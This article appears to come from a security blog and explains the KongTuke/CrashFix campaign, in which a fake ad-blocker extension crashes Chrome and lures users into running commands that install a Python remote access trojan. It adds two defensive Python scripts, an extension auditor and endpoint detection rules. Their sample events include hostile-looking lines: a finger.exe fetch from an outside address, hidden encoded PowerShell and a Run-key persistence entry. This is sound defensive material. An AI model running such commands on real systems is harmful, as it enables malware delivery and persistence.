KongTuke: the campaign that turns a browser extension into a persistent remote access door

Published · 6 min read · 170 reads

Security researchers have recently uncovered a campaign that combines tailored social engineering with technical tricks to turn a browser extension into a door to persistent remote access. The findings, published by Huntress, describe an operation named KongTuke that used a malicious extension posing as an ad blocker; the extension deliberately forced the browser to crash in order to fool the user into running commands that downloaded and deployed advanced malware.

The initial vector is surprisingly mundane: someone searches for an ad blocker, is served a malicious ad and ends up installing an extension from the official Chrome Web Store that appears legitimate. The malicious piece identified by the researchers was called "NexShield - Advanced Web Guardian" and was designed to look almost identical to the legitimate uBlock Origin Lite, which allowed thousands of users to install it before it was removed.

Image generated with AI.

What is technically interesting is how the extension turns the user's frustration into the delivery mechanism for the second stage. After a period of intentional latency (the malicious payload activates with a delay to avoid immediate detection), the extension shows a fraudulent alert stating that the browser has failed and offering a "repair scan." If the user follows the instructions, they are asked to open the Windows Run dialog and paste a command that has already been placed on the clipboard. That command, far from being a harmless diagnostic utility, triggers a mechanism that causes extreme resource consumption in the browser: runtime port connections are created repeatedly in an infinite loop until the browser becomes unstable and finally crashes.

The overload technique abuses the browser's extension runtime API to create a flood of runtime connections, exhausting memory and CPU until the browser freezes and closes. Meanwhile, the extension implements logic that detects the forced restart of the browser and reacts by showing the same fraudulent window on the next startup, feeding a loop in which the same "solution" is offered over and over to already frustrated users. For background on the abused APIs, Chrome's extension documentation explains how runtime ports work: developer.chrome.com/docs/extensions/reference/runtime.

The campaign does not stop at the crash: there is a second malicious act. The extension sends a unique identifier to an attacker-controlled server and, when certain conditions are met (the identifier exists, the server responds and the user has interacted with the popup), runs a command that uses a legitimate Windows utility to download the next stage from a remote address. This command triggers a PowerShell chain with multiple layers of Base64 and XOR obfuscation, which unwraps into a payload that probes the machine for analysis tools and virtualized environments. If it detects that the machine belongs to a corporate domain, the flow ends with the installation of a remote access trojan written in Python, nicknamed ModeloRAT.

ModeloRAT uses RC4 encryption for communications with the command-and-control server, establishes persistence by modifying the Windows Registry and lets operators run binaries, libraries, Python scripts and PowerShell commands. Its polling and communication behaviour is designed to evade detection: under normal operation it uses unusual beaconing intervals, but it can switch to an active mode with very fast polling when ordered to. After repeated communication failures, the malware slows its pace to minimize noise and remain stealthy.

The technical details documented by Huntress show that the operators behind the traffic infrastructure (known in the community as KongTuke, 404 TDS or TAG-124, depending on the report) have a history of distributing payloads and "handing off" access to third parties, including ransomware families. Earlier analysis of this infrastructure and its links to other groups has been reported by intelligence firms, which underlines that this is not an isolated test but a distribution chain with clear operational objectives. For context on the activity of these distribution systems and their use by criminal actors, intelligence firms such as Recorded Future have published analyses of groups and TDSs that facilitate this type of illicit trade (see Recorded Future).

As for the campaign's persistence and its technical defences: the extension incorporated anti-analysis measures, such as disabling the context menu and blocking keyboard shortcuts to make it difficult for the user to open developer tools or inspect the code. In addition, the final payload checks hundreds of indicators of analysis environments and aborts if it finds records typical of malware laboratories, which complicates researchers' work. The infrastructure indicators and files associated with the campaign were recorded on platforms such as VirusTotal for tracking: nexsnield[.]com on VirusTotal.

Beyond the technical explanation, there is a clear lesson about the human factor. This attack exploits trust in browser extensions and in messages that appear to solve an immediate problem. By imitating a well-known open source project and replicating its interface, the attackers reduce warning signs and increase the chances that the victim follows the instructions.

What can users and companies do to reduce the risk? First, distrust instructions that ask you to run commands copied from a site or pop-up window: never paste or run commands that you have not checked. Review and manage installed extensions, removing anything unknown or not from a trusted source. For step-by-step help on removing extensions in Chrome, Google's official documentation gives clear instructions: support.google.com/chrome/answer/187443. In corporate environments, extension management policies and centralized installation controls can prevent users from installing unauthorized add-ons. Security teams are also advised to check outgoing connections and endpoint anomalies, and to keep antivirus and EDR solutions up to date to detect script execution patterns and Registry persistence.
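Reviewing installed extensions by hand does not scale past a handful of machines, and a look-alike such as NexShield is precisely designed to pass a visual check. As an added example (not the article's or any vendor's code), the following Python inventories a Chrome profile's Extensions directory from its manifest.json files and flags three things: extensions whose Web Store ID is not on an allowlist, extensions that reuse an allowlisted name under a different ID (the impersonation pattern), and unknown extensions that request high-privilege permissions. The allowlist ID is a constructed placeholder; a real allowlist would carry the 32-letter IDs taken from the Chrome Web Store URLs of the approved extensions.

```python
import json
import re
from pathlib import Path

# Allowlist keyed by Web Store ID. The ID is a constructed placeholder; real IDs
# are 32 letters (a-p) copied from the extension's Web Store URL.
APPROVED = {
    "abcdefghijklmnopabcdefghijklmnop": "uBlock Origin Lite",
}

# Permissions that let an extension read or change more than an ad blocker needs
# (clipboardWrite is how a "paste this command" lure stages its payload).
SENSITIVE_PERMISSIONS = {"clipboardWrite", "scripting", "webRequest", "nativeMessaging", "debugger"}


def normalize(name: str) -> str:
    """Fold case, punctuation and spacing so look-alike names compare equal."""
    return re.sub(r"[^a-z0-9]+", "", name.lower())


def resolve_name(ext_dir: Path, manifest: dict) -> str:
    """Resolve __MSG_key__ names from the extension's default-locale messages.json."""
    name = manifest.get("name", "")
    match = re.fullmatch(r"__MSG_(\w+)__", name)
    if not match:
        return name
    locale = manifest.get("default_locale", "en")
    msg_file = ext_dir / "_locales" / locale / "messages.json"
    if msg_file.is_file():
        messages = json.loads(msg_file.read_text(encoding="utf-8-sig"))
        return messages.get(match.group(1), {}).get("message", name)
    return name


def inventory(profile_dir: Path) -> list:
    """Enumerate <profile>/Extensions/<id>/<version>/manifest.json."""
    found = []
    for manifest_path in sorted((profile_dir / "Extensions").glob("*/*/manifest.json")):
        manifest = json.loads(manifest_path.read_text(encoding="utf-8-sig"))
        found.append({
            "id": manifest_path.parts[-3],
            "version": manifest_path.parts[-2],
            "name": resolve_name(manifest_path.parent, manifest),
            "permissions": set(manifest.get("permissions", [])),
            "host_permissions": set(manifest.get("host_permissions", [])),
        })
    return found


def classify(ext: dict, approved: dict = APPROVED) -> str:
    if ext["id"] in approved:
        return "approved"
    if normalize(ext["name"]) in {normalize(n) for n in approved.values()}:
        return "impersonation"  # approved name, unknown ID: the NexShield pattern
    if ext["permissions"] & SENSITIVE_PERMISSIONS or "<all_urls>" in ext["host_permissions"]:
        return "unknown-high-privilege"
    return "unknown"


def audit(profile_dir: Path, approved: dict = APPROVED) -> list:
    """Return every installed extension with a verdict attached."""
    return [dict(ext, verdict=classify(ext, approved)) for ext in inventory(profile_dir)]


if __name__ == "__main__":
    import os
    # Default Chrome profile on Windows; adjust for other platforms or profiles.
    profile = Path(os.environ.get("LOCALAPPDATA", "")) / "Google" / "Chrome" / "User Data" / "Default"
    for ext in audit(profile):
        print(f"{ext['verdict']:22} {ext['id']} {ext['name']} {ext['version']}")
```

The name comparison is deliberately loose (case, spacing and punctuation are ignored), so "uBlock  Origin-Lite" under a foreign ID is reported as impersonation; the ID, not the name, is what the allowlist trusts. Run it across a fleet and the "impersonation" and "unknown-high-privilege" rows are the ones to triage first.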

Image generated with AI.

Finally, it is worth remembering that attackers often use legitimate system tools to download and run payloads, relying on built-in Windows utilities to blend the malicious signal into normal activity. A technical example of a utility used in this campaign is documented in Microsoft's official reference for certain system commands, which is worth knowing in order to understand how they can be misused: finger.exe in Microsoft documentation.
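The defensive advice above (watch script execution patterns, Registry persistence and abuse of built-in utilities such as finger.exe) translates directly into endpoint detection rules. The following Python is an added example, not code from the article or from Huntress, that runs four such rules over constructed Sysmon-style events (event_id 1 = process creation, 13 = registry value set; the field names follow Sysmon, the values, user name, SID and paths are invented): any execution of finger.exe, encoded or Base64-decoding PowerShell, a Run key pointing at a Python interpreter or a user-writable path, and a Python script host spawning a shell, which matches the behaviour described for ModeloRAT.

```python
import re

# Constructed telemetry: four events that should alert and two benign ones that must not.
SAMPLE_EVENTS = [
    {"event_id": 1, "image": r"C:\Windows\System32\finger.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": "finger update@203.0.113.10", "user": r"CORP\alice"},
    {"event_id": 1, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "command_line": "powershell -nop -w hidden -EncodedCommand SQBFAFgAIAAoAE4A", "user": r"CORP\alice"},
    {"event_id": 13, "user": r"CORP\alice",
     "target_object": r"HKU\S-1-5-21-1111111111-2222222222-3333333333-1001\Software\Microsoft\Windows\CurrentVersion\Run\Updater",
     "details": r"C:\Users\alice\AppData\Local\Programs\Python\pythonw.exe C:\Users\alice\AppData\Roaming\svc\main.py"},
    {"event_id": 1, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Users\alice\AppData\Local\Programs\Python\pythonw.exe",
     "command_line": "powershell -c Get-ComputerInfo", "user": r"CORP\alice"},
    # benign noise
    {"event_id": 1, "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": "chrome.exe --profile-directory=Default", "user": r"CORP\alice"},
    {"event_id": 13, "user": "SYSTEM",
     "target_object": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SecurityHealth",
     "details": r"C:\Windows\System32\SecurityHealthSystray.exe"},
]

SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
SCRIPT_HOSTS = {"python.exe", "pythonw.exe"}
# -e, -enc, -Encoded and -EncodedCommand are all accepted by PowerShell.
ENCODED_FLAG = re.compile(r"\s-e(?:nc|ncoded|ncodedcommand)?\b", re.I)
RUN_KEY = re.compile(r"\\CurrentVersion\\Run(Once)?\\", re.I)


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def rule_lolbin_finger(ev):
    """finger.exe is rarely used legitimately; any execution is worth a look."""
    if ev["event_id"] == 1 and basename(ev["image"]) == "finger.exe":
        return f"finger.exe run by {basename(ev['parent_image'])}: {ev['command_line']}"


def rule_encoded_powershell(ev):
    if ev["event_id"] != 1 or basename(ev["image"]) not in {"powershell.exe", "pwsh.exe"}:
        return None
    cmd = ev["command_line"]
    if ENCODED_FLAG.search(cmd) or "frombase64string" in cmd.lower():
        return f"encoded/obfuscated PowerShell spawned by {basename(ev['parent_image'])}"


def rule_run_key_script_interpreter(ev):
    if ev["event_id"] != 13 or not RUN_KEY.search(ev["target_object"]):
        return None
    details = ev["details"]
    if re.search(r"\\python(w)?\.exe\b", details, re.I) or re.search(r"\\AppData\\", details, re.I):
        return f"Run key points at a script interpreter or user-writable path: {details}"


def rule_script_host_spawns_shell(ev):
    if (ev["event_id"] == 1 and basename(ev["parent_image"]) in SCRIPT_HOSTS
            and basename(ev["image"]) in SHELLS):
        return f"{basename(ev['parent_image'])} spawned {basename(ev['image'])}: {ev['command_line']}"


RULES = [rule_lolbin_finger, rule_encoded_powershell,
         rule_run_key_script_interpreter, rule_script_host_spawns_shell]


def detect(events) -> list:
    """Apply every rule to every event; return one alert per rule hit, in event order."""
    alerts = []
    for ev in events:
        for rule in RULES:
            summary = rule(ev)
            if summary:
                alerts.append({"rule": rule.__name__, "user": ev.get("user"), "summary": summary})
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(f"[{alert['rule']}] {alert['user']}: {alert['summary']}")
```

Each rule is narrow on purpose: on its own, encoded PowerShell or a Run key in AppData has benign explanations, but the same user producing all four within minutes is the chain the article describes, so correlating alerts by user and time is the natural next step.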

The KongTuke campaign and its CrashFix variant are a reminder that safe browsing depends on a combination of individual digital hygiene and robust technical policies. Extensions are powerful and useful, but they also constitute an attack surface that can be exploited very effectively when combined with well-executed psychological deception and proven distribution infrastructure. Staying informed, verifying sources and implementing technical controls are the best defences against such threats.

For a direct, technical reading of the report that prompted this analysis, Huntress's original research provides a complete breakdown of the attack chain and indicators of compromise: Huntress - CrashFix / KongTuke. To contrast and expand the context on associated actors and TDSs, it is worth consulting additional intelligence reports and technical repositories.
